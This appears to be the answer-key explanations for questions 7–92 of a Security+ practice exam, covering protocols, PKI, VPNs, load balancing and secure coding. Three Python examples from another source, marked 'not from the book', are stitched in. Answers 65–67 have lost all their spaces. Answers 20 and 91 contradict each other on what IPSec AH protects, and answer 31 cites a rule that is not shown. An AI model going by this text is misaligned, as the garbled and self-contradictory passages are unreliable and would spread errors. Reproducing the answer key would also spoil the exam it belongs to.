7. C. In this scenario, Denny specifically needs to ensure that he stops the most malware. In situations like this, vendor diversity is the best way to detect more malware, and installing a different vendor's antivirus (AV) package on servers like email servers and then installing a managed package for PCs will result in the most detections in almost all cases. Installing more than one AV package on the same system is rarely recommended, since this often causes performance issues and conflicts between the packages—in fact, at times AV packages have been known to detect other AV packages because of the deep hooks they place into the operating system to detect malicious activity!

8. B. Amanda has encountered a captive portal. Captive portals redirect all traffic to the portal page, either to allow the portal to collect information or to display the page itself. Once users have completed the requirements that the portal puts in place, they are permitted to browse the Internet. This may be accomplished by assigning a new IP address or by allowing the connected IP address to have access to the Internet using a firewall rule or other similar method. Preshared keys are used in wireless networks for authentication. Port security is used for wired networks, and WPA stands for Wi-Fi Protected Access, as in WPA, WPA-2, and WPA-3.

9. B. Domain Name System Security Extensions, or DNSSEC, provides the ability to validate DNS data and denial of existence, and provides data integrity for DNS. It does not provide confidentiality or availability controls. If Charles needs to provide those, he will have to implement additional controls.

10. B. Google is acting as an identity provider, or IdP. An IdP creates and manages identities for federations. An RP is a relying party, which relies on an identity provider. An SP is a service provider, and an RA is a registration authority involved in the process for providing cryptographic certificates.

11. C. SSH, or Secure Shell, is a secure protocol used to connect to command-line shells. SSH can also be used to tunnel other protocols, making it a useful and frequently used tool for system administrators, security professionals, and attackers. Using HTTPS or Transport Layer Security (TLS) for a secure command line is rare, and Telnet is an insecure protocol.

12. B. Of the options provided, only FIDO U2F, an open standard provided by the Fast IDentity Online Alliance, is a standard for security keys. Other standards that you may encounter include OTP (One Time Password), Smart Card, OATH-HOTP, and OpenPGP. Of note, OATH, the Initiative for Open Authentication, provides standards for both HMAC-based one time password (HOTP) and TOTP, or time-based one time passwords. SAML (Security Assertion Markup Language) and OpenID are both used in authentication processes but not for security keys. ARF was made up for this question.

13. C. Nadia should use Secure/Multipurpose Internet Mail Extensions (S/MIME), which supports asymmetric encryption, and should then use Danielle's public key to encrypt the email so that only Danielle can decrypt the messages and read them. Secure POP3 would protect messages while they're being downloaded but would not protect the content of the messages between servers.

14. B. SRTP is a secure version of the Real-Time Transport Protocol and is used primarily for Voice over IP (VoIP) and multimedia streaming or broadcast. SRTP, as currently implemented, does not fully protect packets, leaving RTP headers exposed, potentially exposing information that might provide attackers with information about the data being transferred.

15. C. Olivia should make her organization aware that a failure in one of the active nodes would result in less maximum throughput and a potential for service degradation. Since services are rarely run at maximum capacity, and many can have maintenance windows scheduled, this does not mean that the load balancers cannot be patched. There is nothing in this design that makes the load balancers more vulnerable to denial of service than they would be under any other design.

16. A. File Transfer Protocol Secure (FTPS) typically uses port 990 for implicit FTPS, and port 21, the normal FTP command port, is used for explicit FTPS. Port 22 is used for SSH, 433 was used for the Network News Transfer Protocol (NNTP), 1433 is used for Microsoft SQL, and port 20 is used for FTP.

17. A. Certificate stapling allows the server that is presenting a certificate to provide a more efficient way to check the revocation status of the certificate via the Online Certificate Status Protocol (OCSP) by including the OCSP response with the handshake for the certificate. This provides both greater security because clients know that the certificate is valid, and greater efficiency because they don't have to perform a separate retrieval to check the certificate's status. The rest of the options were made up and are not certificate stapling.

18. B. A registration authority, or RA, receives requests for new certificates as well as renewal requests for existing certificates. They can also receive revocation requests and similar tasks. An intermediate CA is trusted by the root CA to issue certificates. A CRL is a certificate revocation list.

19. C. Least connection-based load balancing takes load into consideration and sends the next request to the server with the least number of active sessions. Round robin simply distributes requests to each server in order, whereas weighted time uses health checks to determine which server responds the most quickly on an ongoing basis and then sends the traffic to that server. Finally, source IP hashing uses the source and destination IP addresses to generate a hash key and then uses that key to track sessions, allowing interrupted sessions to be reallocated to the same server and thus allowing the sessions to continue.
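As an added example (not from the book), the four scheduling strategies described in answer 19 implemented side by side in Python so their selection behaviour can be compared on the same pool. The backend names, the client and destination addresses (taken from documentation ranges) and the health-check latencies are constructed; "weighted time" is modelled with a latency table instead of live probes.

```python
"""Load-balancer scheduling strategies from answer 19 (added example, not from the book)."""
import hashlib
import itertools
from typing import Dict, List

BACKENDS = ["web-1", "web-2", "web-3"]  # constructed backend pool


class LoadBalancer:
    def __init__(self, backends: List[str]):
        self.backends = list(backends)
        self._rr = itertools.cycle(self.backends)
        # Active session count per backend, updated by open/close_session.
        self.active: Dict[str, int] = {b: 0 for b in self.backends}
        # Most recent health-check response time in ms (constructed values).
        self.latency_ms: Dict[str, float] = {b: 10.0 for b in self.backends}

    def round_robin(self) -> str:
        """Next backend in fixed order, ignoring load entirely."""
        return next(self._rr)

    def least_connections(self) -> str:
        """Backend with the fewest active sessions; ties go to the first listed."""
        return min(self.backends,
                   key=lambda b: (self.active[b], self.backends.index(b)))

    def weighted_time(self) -> str:
        """Backend that answered its last health check fastest."""
        return min(self.backends, key=lambda b: self.latency_ms[b])

    def source_ip_hash(self, src_ip: str, dst_ip: str) -> str:
        """Hash the source/destination pair so a client always maps to the
        same backend, which is what lets an interrupted session resume there."""
        key = hashlib.sha256(f"{src_ip}->{dst_ip}".encode()).digest()
        return self.backends[int.from_bytes(key[:4], "big") % len(self.backends)]

    def open_session(self, backend: str) -> None:
        self.active[backend] += 1

    def close_session(self, backend: str) -> None:
        self.active[backend] -= 1


def demo() -> Dict[str, object]:
    """Drive each strategy on a constructed pool and return what each picked."""
    lb = LoadBalancer(BACKENDS)
    rr = [lb.round_robin() for _ in range(4)]          # wraps back to web-1
    lb.open_session("web-1")
    lb.open_session("web-1")
    lb.open_session("web-2")
    lc = lb.least_connections()                        # web-3 has 0 sessions
    lb.latency_ms.update({"web-1": 25.0, "web-2": 5.0, "web-3": 12.0})
    wt = lb.weighted_time()                            # web-2 answered fastest
    first = lb.source_ip_hash("203.0.113.7", "198.51.100.10")
    again = lb.source_ip_hash("203.0.113.7", "198.51.100.10")
    return {"round_robin": rr, "least_conn": lc,
            "weighted_time": wt, "sticky": first == again}


if __name__ == "__main__":
    print(demo())
```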

20. A. IPSec's Authentication Header (AH) protocol does not provide data confidentiality because it secures only the header, not the payload. That means that AH can provide integrity and replay protection but leaves the rest of the data at risk. Matt should note this and express concerns about why the VPN is not using Encapsulating Security Protocol (ESP).

21. C. Michelle knows that POP3 runs on port 110 by default, and that TLS (via STARTTLS as an extension) allows POP3 clients to request a secure connection without needing to use the alternate port 995 used in some configurations. Port 25 is the default port for Simple Mail Transfer Protocol (SMTP), and IKE is used for IPSec.

22. A. A cloud access security broker (CASB) is a software tool or service that sits between an organization's on-premises network and a cloud provider's infrastructure. A CASB acts as a gatekeeper, allowing the organization to extend the reach of their security policies into the cloud.

23. A. Angela's company has deployed a version of Session Initiation Protocol (SIP) that doesn't use Transport Layer Security (TLS) to maintain confidentiality. She should switch to a SIP Secure (SIPS) implementation to protect the confidentiality of phone conversations. Vishing, or voice phishing; war dialing, which attempts to map all numbers for a phone service, typically to find modems; and denial of service are all less likely on a VoIP network, although they could occur.

24. B. The fastest way for Alaina to implement secure transport for her Network Time Protocol (NTP) traffic will typically be to simply tunnel the traffic via Secure Shell (SSH) from the NTP server to her Linux systems. An IPSec virtual private network (VPN) between devices will typically take more work to set up and maintain, although this could be scripted, and a Transport Layer Security (TLS) VPN would require additional work since it is intended for web traffic. RDP is the Remote Desktop Protocol and is primarily used for Windows systems and would not be a good choice. In most environments, however, NTP traffic does not receive any special security, and NTP sources are trusted to perform without exceptional security measures.

25. D. The safest and most secure answer is that Ramon should simply implement TLS for the entire site. Although TLS does introduce some overhead, modern systems can handle large numbers of simultaneous TLS connections, making a secure website an easy answer in almost all cases.

26. D. Although IP addresses for public servers and clients are not typically considered sensitive, the usernames, passwords, and files that the contractors use would be. Katie should consider helping her organization transition to a secure FTP or other service to protect her organization's customers and the organization itself.

27. D. Dynamic Host Configuration Protocol (DHCP) sniffing or snooping can be enabled to prevent rogue DHCP servers as well as malicious or malformed DHCP traffic. It also allows the capture and collection of DHCP binding information to let network administrators know who is assigned what IP address.

28. B. Aaron can use a wildcard certificate to cover all the hosts inside of a set of subdomains. Wildcards only cover a single level of subdomain, however, so if he purchased *.example.com, he could not use *.blog.example.com. A self-signed certificate will cause errors for visitors in most browsers and should not be used for production purposes. Extended validation (EV) certificates will not provide this functionality, and Secure Sockets Layer (SSL) is no longer in use with the switch to TLS for security reasons.
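An added example (not from the book) that makes the scope rule in answer 28 concrete: a small matcher that applies a certificate's name list to a hostname, allowing a wildcard only as the whole leftmost label and only for exactly one level of subdomain. It also covers the multi-name SAN case from answer 73 later in this chapter. The certificate name lists and hostnames are constructed; this illustrates the rules and is not a substitute for the TLS library's own validation.

```python
"""Wildcard and SAN hostname coverage (added example, not from the book)."""
from typing import Iterable, List


def _match_one(pattern: str, host: str) -> bool:
    """Match one certificate name (literal or '*.label.tld') against a host."""
    pattern = pattern.lower().rstrip(".")
    host = host.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == host
    p_labels, h_labels = pattern.split("."), host.split(".")
    # The wildcard must be the entire leftmost label, with at least two
    # labels after it ("*.com" style names are not accepted), and no other
    # label may contain a wildcard.
    if p_labels[0] != "*" or len(p_labels) < 3:
        return False
    if any("*" in label for label in p_labels[1:]):
        return False
    # Equal label counts: '*' covers exactly one level, never zero or several,
    # so *.example.com matches www.example.com but neither example.com nor
    # www.blog.example.com.
    if len(h_labels) != len(p_labels):
        return False
    return h_labels[0] != "" and h_labels[1:] == p_labels[1:]


def certificate_covers(names: Iterable[str], host: str) -> bool:
    """True if any name on the certificate (CN or SAN entries) covers host."""
    return any(_match_one(name, host) for name in names)


def uncovered_hosts(names: Iterable[str], hosts: Iterable[str]) -> List[str]:
    """Hosts that would raise a name-mismatch error under this certificate."""
    name_list = list(names)
    return [h for h in hosts if not certificate_covers(name_list, h)]


# Constructed demo data mirroring the answer's scenario.
WILDCARD_CERT = ["*.example.com"]
SAN_CERT = ["www.example.com", "shop.example.com", "example.com"]
DEMO_HOSTS = ["www.example.com", "blog.example.com", "example.com",
              "www.blog.example.com"]

if __name__ == "__main__":
    print(uncovered_hosts(WILDCARD_CERT, DEMO_HOSTS))
    # ['example.com', 'www.blog.example.com']
```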

29. D. Root Guard can be set on a per-port basis to protect ports that will never be set up to be the root bridge for a VLAN. Since this shouldn't change regularly, it is safe to set for most ports in a network. Spanning tree is used to prevent loops, so disabling STP would actually make this problem more likely. Bridge IDs cannot be negative, and Bridge Protect was made up for this question.

30. C. A Personal Information Exchange (PFX) formatted file is a binary format used to store server certificates, as well as intermediary certificates, and it can also contain the server's private key. Privacy Enhanced Mail (PEM) files can contain multiple PEM certificates and a private key, but most systems store certificates and the key separately. Distinguished Encoding Rules (DER) format files are frequently used with Java platforms and can store all types of certificates and private keys. P7B, or PKCS#7, formatted files can contain only certificates and certificate chains, not private keys. For the exam, you should also know that a CER is a file extension for an SSL certificate file format used by web servers to help verify the identity and security of the site in question. SSL certificates are provided by a third-party security certificate authority such as VeriSign, GlobalSign, or Thawte.

A P12 file contains a digital certificate that uses PKCS#12 (Public Key Cryptography Standard #12) encryption. The P12 file contains both the private and the public key, as well as information about the owner (name, email address, etc.), all being certified by a third party. With such a certificate, a user can identify themselves and authenticate themselves to any organization trusting the third party.

31. D. A firewall has two types of rules. One type is to allow specific traffic on a given port. The other type of rule is to deny traffic. What is shown here is a typical firewall rule. Options A, B, and C are incorrect. The rule shown is clearly a firewall rule.


32. C. Many subscription services allow for data retrieval via HTTPS. Ted can subscribe to one or more threat feeds or reputation services, and then feed that information to an intrusion detection system (IDS), intrusion prevention system (IPS), next-generation firewall, or similar network security tool. Security Assertion Markup Language (SAML) is used to make assertions about identities and authorization, a VDI is a virtual desktop environment, and FDE is full-disk encryption.

33. B. Secure cookies are HTTP cookies that have the secure flag set, thus requiring them to only be sent via a secure channel like HTTPS. They are not stored in encrypted form or hashed, and cookie keys were made up for this question.

34. D. Unlike IPSec's tunnel mode, IPSec transport mode allows different policies per port. The IP addresses in the outer header for transport mode packets are used to determine the policy applied to the packet. IPSec doesn't have a PSK mode, but WPA-2 does. IKE is used to set up security associations in IPSec but doesn't allow this type of mode setting.

35. A. WPS personal identification numbers (PINs) were revealed to be a problem in 2011, when a practical brute-force attack against WPS PIN setup modes was demonstrated. WPS suffers from a variety of other security issues and is not used for enterprise security. WPS remains in use in home environments for ease of setup.

36. C. The Online Certificate Status Protocol, or OCSP, is used to determine the status of a certificate. RTCP, CRBL, and PKCRL were all made up for this question.

37. C. Certificate revocation lists (CRLs) are designed specifically for revoking certificates. Since public keys are distributed via certificates, this is the most effective way to deauthorize a public key. Option A is incorrect. Simply notifying users that a key/certificate is no longer valid is not effective. Option B is incorrect. Deleting a certificate is not always possible and ignores the possibility of a duplicate of that certificate existing. Option D is incorrect. The registration authority (RA) is used in creating new certificates, not in revoking them.

38. C. Global Positioning System (GPS) data and data about local Wi-Fi networks are the two most commonly used protocols to help geofencing applications determine where they are. When a known Wi-Fi signal is gained or lost, the geofencing application knows it is within range of that network. GPS data is even more useful because it can work in most locations and provide accurate location data. Although Bluetooth is sometimes used for geofencing, its limited range means that it is a third choice. Cellular information would require accurate tower-based triangulation, which means it is not typically used for geofencing applications, and of course USB is a wired protocol.

39. A. The demilitarized zone (DMZ) is a zone between an outer firewall and an inner firewall. It is specifically designed as a place to locate public-facing servers. The outer firewall is more permissive, thus allowing public access to the servers in the DMZ. However, the inner firewall is more secure, thus preventing outside access to the corporate network.

40. C. The first step in security is hardening the operating system, and one of the most elementary aspects of that is turning off unneeded services. This is true regardless of the operating system. Although installing antimalware, implementing usage policies, and setting password reuse policies are all good practices, turning off unnecessary services is typically the first step in securing a system.

41. C. Knowledge-based authentication requires information that only the user is likely to know. Examples include things like previous tax payments, bill amounts, and similar information. Requesting a Social Security number is less secure and would only work for users in the United States. Federated identity via Google accounts does not meet this need because Google accounts do not have a user validation requirement. Finally, validation emails only prove that the user has access to an account that they provide, not that they are a specific individual.

42. A. A Transport Layer Security (TLS) VPN is frequently chosen when ease of use is important, and web applications are the primary usage mode. IPSec VPNs are used for site-to-site VPNs and for purposes where other protocols may be needed, because they make the endpoint system appear to be on the remote network.

43. A. Full-disk encryption (FDE) fully encrypts the hard drive on a computer. This is an effective method for ensuring the security of data on a computer. Trusted Platform Modules (TPMs) store keys and are used for boot integrity and other cryptographic needs and won't directly protect the data. Software-defined networking (SDN) is virtualized networking, and demilitarized zones (DMZs) are used to segment a network and won't affect this problem.

44. A. A DMZ (demilitarized zone) provides limited access to public-facing servers for outside users, but blocks outside users from accessing systems inside the LAN. It is a common practice to place web servers in the DMZ. A virtual LAN, or VLAN, is most often used to segment the internal network, routers direct traffic based on IP address, and a guest network allows internal users who are not employees to get access to the Internet.

45. D. Identity attributes are characteristics of an identity, including details like the individual's birth date, age, job title, address, or a multitude of other details about the identity. They are used to differentiate the identity from others and may also be used by the identity management system or connected systems in coordination with the identity itself. Roles describe the job or position an individual has in an organization, and factors are something you know, something you have, or something you are. Identifiers are not a common security or authentication term, although identity is.

46. D. The CN, or common name, for a certificate for a system is typically the fully qualified domain name (FQDN) for the server. If Megan was requesting a certificate for herself, instead of for a server, she would use her full name.

47. B. Physically partitioning your network is the physical equivalent of a virtual LAN, or VLAN. A VLAN is designed to emulate physical partitioning. Perimeter security does not segment the network. Security zones are useful but don't, by themselves, segment a network. Often a network is segmented, using physical partitions or VLANs, to create security zones. A firewall is meant to block certain traffic, not to segment the network, although a firewall can be part of a segmentation or security zone implementation.

48. D. Nelson is using a whitelisting (or allowed list) tool. Tools like this allow only specific applications to be installed and run on a system and often use hashes of known good applications to ensure that the applications are those that are permitted. A blacklisting (or blocked list) tool prevents specific applications or files from being used, stored, or downloaded to a system. Although antivirus and antimalware tools may have similar features, the most accurate answer here is whitelisting.

49. B. A stateful inspection firewall examines the content and context of each packet it encounters. This means that a stateful packet inspection (SPI) firewall understands the preceding packets that came from the same IP address, and thus the context of the communications. This makes certain attacks, like a SYN flood, almost impossible. Packet filtering firewalls examine each packet but not the context. Application-layer firewalls can use SPI or simple packet filtering, but their primary role is to examine application-specific issues. A common example is a web application firewall. A gateway firewall is simply a firewall at the network gateway. This does not tell us whether it is packet filtering or SPI.

50. A. Wireless network heat maps are used to show how strong wireless network signals are throughout a building or location. Scott can use a heat map like this to see where the wireless signal drops off or where interference may occur. A network diagram would show the logical layout of a network. A demilitarized zone (DMZ) is a network security zone that is exposed to a higher risk region, and a zone map is not a common security term.

51. B. A demilitarized zone (DMZ) is a separate subnet coming off the separate router interface. Public traffic may be allowed to pass from the external public interface to the DMZ, but it won't be allowed to pass to the interface that connects to the internal private network. A guest network provides visitors with Internet access. An intranet consists of internal web resources. Frequently companies put up web pages that are accessible only from within the network for items like human resources notifications, vacation requests, and so forth. A virtual LAN, or VLAN, is used to segment your internal network.

52. C. The application includes input validation techniques that are used to ensure that unexpected or malicious input does not cause problems with the application. Input validation techniques will strip out control characters, validate data, and perform a variety of other actions to clean input before it is processed by the application or stored for future use. This validation may help prevent buffer overflows, but other techniques described here are not used for buffer overflow prevention. String injection is actually something this helps to prevent, and schema validation looks at data to ensure that requests match a schema, but again this is a narrower description than the broad range of input validation occurring in the description.

53. C. WPA3 supports SAE, or simultaneous authentication of equals, providing a more secure way to authenticate that limits the potential for brute-force attacks and allows individuals to use different passwords. WPA is not as secure as WPA2, and WEP is the oldest, and least secure, wireless security protocol.

54. A. In order to stop attack traffic, an IPS needs to be deployed inline. Deployments that use a network tap receive a copy of the data without being in the flow of traffic, which makes them ideal for detection but removes the ability to stop traffic. Deploying as an intrusion detection system (IDS) instead of an IPS means that the system will only detect, not stop, attacks.

55. B. The correct answer is to use a sandboxed environment to test the malware and determine its complete functionality. A sandboxed system could be an isolated virtual machine (VM) or an actual physical machine that is entirely isolated from the network. Leaving the malware on a production system is never the correct approach. You should test or analyze the malware to determine exactly what malware it is, allowing you to respond to the threat properly. A honeypot is used for luring and trapping attackers, not for testing malware.

56. B. Hardening is the process of improving the security of an operating system or application. One of the primary methods of hardening a trusted OS is to eliminate unneeded protocols. This is also known as creating a secure baseline that allows the OS to run safely and securely. FDE is full-disk encryption, a SED is a self-encrypting drive, and baselining is the process of establishing security standards.

57. C. Although trust in the site is likely to be reduced because users will receive warnings, the actual underlying encryption capabilities will not change. Users will not be redirected to the certificate authority's site, and if they click past the warnings, users will be able to continue normally and with an encrypted connection.

58. D. Isaac knows that trusting client systems to be secure is not a good idea, and thus ensuring that validation occurs on a trusted client is not an appropriate recommendation. Ensuring that validation occurs on a trusted server, that client data is validated, and that data types and ranges are reasonable are all good best practices for him to recommend.

59. C. Trusted Platform Modules (TPMs) provide a random number generator, the ability to generate cryptographic keys, support for remote attestation as part of the boot process, as well as binding and sealing capabilities. They do not act as cryptographic processors to speed up Secure Sockets Layer (SSL) or Transport Layer Security (TLS) traffic.

60. B. Hashing is commonly used in databases to increase the speed of indexing and retrieval since it is typically faster to search for a hashed key rather than the original value stored in a database. Hashing is not a form of encryption, meaning that it is not used to encrypt stored data. Hashing is not used to obfuscate data or to substitute for sensitive data.

61. C. The correct answer is to only allow signed components to be loaded in the browser. Code signing verifies the originator of the component (such as an ActiveX component) and thus makes malware far less likely. Although host-based antimalware is a good idea, it is not the best remedy for this specific threat. Blacklists cannot cover all sites that are infected—just the sites you know about. And given that users on Hans's network visit a lot of websites, blacklisting is likely to be ineffective. Finally, if you block all active content, many websites will be completely unusable.

62. B. Zarmeena has implemented a preshared key, or PSK, authentication method. This means that if she needs to change the key because a staff member leaves, she will need to have every device update their passphrase. For larger deployments, enterprise authentication can connect to an authentication and authorization service, allowing each user to authenticate as themselves. This also provides network administrators with a way to identify individual devices by their authenticated user. Open networks do not require authentication, although a captive portal can be used to require network users to provide information before they are connected to the Internet.

63. A. EAP-FAST is specifically designed for organizations that want to quickly complete reconnections and does not require certificates to be installed at the endpoint device. EAP Tunneled Transport Layer Security (EAP-TTLS) requires client-side certificates; EAP-TLS requires mutual authentication, which can be slower; and Protected Extensible Authentication Protocol (PEAP) is similar to EAP-TTLS.

64. A. The correct answer is to implement a virtual desktop infrastructure (VDI). If all the desktops are virtualized, then from a single central location you can manage patches, configuration, and software installation. This single implementation will solve all the issues mentioned in the question. Restrictive policies are a good idea but are often difficult to enforce. Imaging workstations will affect only their original configuration; it won't keep them patched or prevent rogue software from being installed. Finally, strong patch management will address only one of the three concerns.

65. B. Deployingtomultiplelocationsispartofahighavailabilitystrategythatensuresthatlosingadatacenterordatacentersinasingleregion,orlossofnetworkconnectivitytothatregion,willnottakeaninfrastructuredown.Thisdoesnotprovidegreaterresistancetoinsiderattacks,lowercosts,orvendordiversity.

66. B. ATLS-basedVPN(oftencalledanSSL-basedVPN,despiteSSLbeingoutmoded)providestheeasiestwayforuserstouseVPNsinceitdoesnotrequireaclient.SSLVPNsalsoworkonlyforspecificapplicationsratherthanmakingasystemappearasthoughitisfullyonaremotenetwork.HTML5isnotaVPNtechnology,butsomeVPNportalsmaybebuiltusingHTML5.SecurityAssertionMarkupLanguage(SAML)isnotaVPNtechnology.IPSecVPNsrequireaclientorconfigurationandarethusharderforenduserstouseinmostcases.

67. C. Theseparticularwebapplicationattacksarebestmitigatedwithproperinputvalidation.Anyuserinputshouldbecheckedforindicatorsofcross-sitescripting(XSS)orSQLinjection.Errorhandlingisalwaysimportant,butitwon’tmitigatetheseparticularissues.StoredprocedurescanbeagoodwayofensuringSQLcommandsarestandardized,butthatwon’tpreventtheseattacks.Codesigningisusedforcodethatisdownloadedfromawebapplicationtotheclientcomputer;itisusedtoprotecttheclient,notthewebapplication.

68. C. Isaac can configure a geofence that defines his corporate buildings and campus. He can then set up a geofence policy that will only allow devices to work while they are inside that geofenced area. Patch management, IP filtering, and network restrictions are not suitable solutions for this.

69. B. Fuzzing is a technique whereby the tester intentionally enters incorrect values into input fields to see how the application will handle it. Static code analysis tools simply scan the code for known issues, baselining is the process of establishing security standards, and version control simply tracks changes in the code—it does not test the code.

70. B. Although hardware security modules (HSMs) provide many cryptographic functions, they are not used for boot attestation. A TPM, or Trusted Platform Module, is used for secure boot attestation.

71. A. Cynthia should deploy Radio Frequency Identifier (RFID) cards, which can be read using contactless readers. RFID technology is common and relatively inexpensive, but without additional authentication, possession of a card is the only means of determining if someone is authorized to access a building or room. Wi-Fi is not used for contactless cards because of its power consumption and overhead. Magstripes require a reader rather than being contactless, and HOTP is a form of one-time password system.

72. B. Rate limiting and back-off algorithms both limit how quickly queries can be performed. Requiring authentication would restrict who could access the directory. Requiring LDAPS (Lightweight Directory Access Protocol over SSL) does not prevent enumeration, but it does provide security for the queried information as it transits networks.

73. D. A SAN, or Subject Alternate Name, certificate allows multiple hostnames to be protected by the same certificate. It is not a type of certificate for SAN storage systems. A SAN certificate could be self-signed, but that does not make it a SAN certificate, and of course the security organization SANS is not a certificate authority.

74. A. The correct answer is to assign digital certificates to the authorized users and to use these to authenticate them when logging in. This is an effective way to ensure that only authorized users can access the application. Although the remaining options are all good security measures, they are not the best way to authenticate the client and prevent unauthorized access to the application.

75. D. The correct answer is to first test patches. It is always possible that a patch might cause issues for one or more current applications. This is particularly a concern with applications that have a lot of interaction with the host operating system. An operating system patch can prevent the application from executing properly. But as soon as the patches are tested, a phased rollout to the company should begin. Automatic patching is not recommended in corporate environments because a patch could possibly interfere with one or more applications—thus, a managed patch deployment process is implemented that requires more administrative time but avoids outages due to patches with issues in an organization's specific environment. Having individual users patch their own machines is a bad idea and will lead to inconsistent patching and the application of untested patches. Delegating patch management to managers instead of IT staff can lead to problems, too, due to varying skill sets and practices.

76. B. Although wireless analyzers provide in-depth information about Service Set Identifiers (SSIDs), signal strength, and protocol versions, the Remote Authentication Dial-In User Service (RADIUS) or Kerberos version number for the backend authentication servers is not something that they will typically be able to provide.

77. B. The correct answer is to turn off any remote access to such devices that is not absolutely needed. Many peripheral devices come with SSH (Secure Shell), Telnet, or similar services. If you are not using them, turn them off. Many peripherals don't have disks to encrypt, making full-disk encryption (FDE) a less useful choice. Fuzz testing is used to test code, not devices, and peripherals are unlikely to support digital certificates in most cases.

78. C. Manual code review is a type of static code review where reviewers read through source code to attempt to find flaws in the code. Dynamic code review requires running the code, Fagan testing is a formal code review process that works through multiple phases of the development process, and fuzzing is a form of dynamic inspection that sends unexpected values to a running program.

79. C. Samantha should place her public SSH key in the .ssh directory in her home directory on the remote server. Private keys should never be outside of your control, and unlike many Linux configurations, SSH keys are not kept in the /etc/ directory.

80. C. The correct answer is to use static code analysis. Memory leaks are usually caused by failure to deallocate memory that has been allocated. A static code analyzer can check to see if all memory allocation commands (malloc, alloc, etc.) have a matching deallocation command. Fuzzing involves entering data that is outside expected values to see how the application handles it. Stress testing involves testing how a system handles extreme workloads. Normalization is a technique for deduplicating a database.
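A toy illustration of the check described in this explanation, added here as an example rather than code from the book: a regular-expression pass over a constructed C snippet that flags variables assigned from an allocator but never passed to free() within the same function. The snippet, the function names, and the allocator list are all the example's own; a real static analyzer also tracks ownership transfer across calls and control flow, which this pass deliberately does not.

```python
import re
from typing import Dict, List

# Constructed C snippet for the example (not from the book).
SAMPLE_C = """
int good(void) {
    char *buf = malloc(64);
    if (!buf) return -1;
    free(buf);
    return 0;
}

int leaky(void) {
    char *a = malloc(32);
    int *b = calloc(4, sizeof(int));
    free(a);
    return 0;   /* b is never freed */
}
"""

# A function definition starts at column 0: return type, name, parameter list, '{'.
FUNC_RE = re.compile(r"^\w[\w\s\*]*?\b(\w+)\s*\([^)]*\)\s*\{", re.M)
# 'var = malloc(' / 'var = (cast) calloc(' etc. -> captures the variable name.
ALLOC_RE = re.compile(
    r"\b(\w+)\s*=\s*(?:\([^)]*\)\s*)?(?:malloc|calloc|realloc|strdup)\s*\(")
# 'free(var)' -> captures the variable name.
FREE_RE = re.compile(r"\bfree\s*\(\s*(\w+)\s*\)")


def split_functions(src: str) -> Dict[str, str]:
    """Map each function name to its body text, found by matching braces."""
    funcs: Dict[str, str] = {}
    for m in FUNC_RE.finditer(src):
        depth, i = 1, m.end()
        while i < len(src) and depth:
            depth += {"{": 1, "}": -1}.get(src[i], 0)
            i += 1
        funcs[m.group(1)] = src[m.end():i - 1]
    return funcs


def find_unfreed(src: str) -> Dict[str, List[str]]:
    """Per function, the variables that receive an allocation but are never freed."""
    report: Dict[str, List[str]] = {}
    for name, body in split_functions(src).items():
        allocated = set(ALLOC_RE.findall(body))
        freed = set(FREE_RE.findall(body))
        leaked = sorted(allocated - freed)
        if leaked:
            report[name] = leaked
    return report


if __name__ == "__main__":
    for func, names in find_unfreed(SAMPLE_C).items():
        print(f"{func}: allocated but never freed: {', '.join(names)}")
```

Run on the sample, the checker reports only `leaky`, and only its variable `b`; `good` pairs its malloc with a free and is silent. Because the pass never runs the program, it is exactly the kind of static check the explanation contrasts with fuzzing and stress testing.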

81. D. Load balancers provide a virtual IP, or VIP. Traffic sent to the VIP is directed to servers in the pool based on the load-balancing scheme that that pool is using—often a round-robin scheme, but other versions that include priority order and capacity tracking or ratings are also common. The load balancer's IP address is normally used to administer the system, and individual IP addresses for the clustered hosts are shielded by the load balancer to prevent traffic from consistently going to those hosts, thus creating a failure or load point.

82. D. In a well-implemented password hashing scheme, unique random bits called salts are added to each password before they are hashed. This makes generating a rainbow table or otherwise brute-forcing hashes for all of the passwords stored in a database extremely time-consuming. The remaining options were made up and are not actual security terms.

83. A. The correct answer is to use Secure Shell (SSH). This protocol is encrypted. SSH also authenticates the user with public key cryptography. Telnet is insecure and does not encrypt data. RSH, or Remote Shell, sends at least some data unencrypted and is also insecure. SNMP, or Simple Network Management Protocol, is used to manage a network and is not used for remote communications.

84. A. Resource-based policies are attached to resources and determine who has access to a resource, such as a group of sysadmins or developers, and what actions they can perform on the resource. Cloud services have different terms for monitoring their resource usage; these terms may vary from service to service.

85. A. Networked sensor appliances are deployed in many datacenters to gather information about temperature and humidity as part of the environmental monitoring system. Fire detection and suppression systems are not typically mounted in racks, and power quality and reliability is measured by PDUs (power distribution units), UPS (uninterruptable power supplies), and other power infrastructure.

86. C. Secure IMAP's default port is TCP 993. Laurel can easily guess that the system offers a TLS-protected version of IMAP for clients to use to retrieve email messages. The default port for secure POP is 995, and for secure SMTP the default port is 587. S/MIME does not have a specific port, as it is used to encrypt the content of email messages.

87. C. Ad hoc wireless networks operate in a point-to-point topology. Infrastructure mode access points work in a point-to-multipoint topology. Star and bus models are used in wired networks.

88. C. Only using code that is digitally signed verifies the creator of the software. For example, if a printer/multifunction device (MFD) driver is digitally signed, this gives you confidence that it really is a printer driver from the vendor it purports to be from, and not malware masquerading as a printer driver. Signed software gives you a high degree of confidence that it is not malware but does not provide a guarantee. For example, the infamous Flame virus was signed with a compromised Microsoft digital certificate. Digital signing of software has no effect on patch management. Finally, digitally signed software will not execute faster or slower than unsigned software.

89. D. The Security+ exam refers to password managers as password vaults. Samantha should recommend a password vault that will allow her users to generate, store, and use many passwords securely. None of the other options are good advice for password use and storage.

90. A. Port security filters by MAC address, allowing whitelisted MAC addresses to connect to the port and blocking blacklisted MAC addresses. Port security can be static, using a predetermined list or dynamically allowing a specific number of addresses to connect, or it can be run in a combination mode of both static and dynamic modes.

91. C. Authentication headers (AHs) provide complete packet integrity, authenticating the packet and the header. Authentication headers do not provide any encryption at all, and authentication headers authenticate the entire packet, not just the header.

92. B. A split horizon DNS implementation deploys distinct DNS servers for two or more environments, ensuring that those environments receive DNS information appropriate to the DNS view that their clients should receive. Domain Name System Security Extensions (DNSSEC) is a DNS security set of specifications to help protect DNS data. DMZ DNS and DNS proxying are not design patterns or common terms used in the security or networking field.

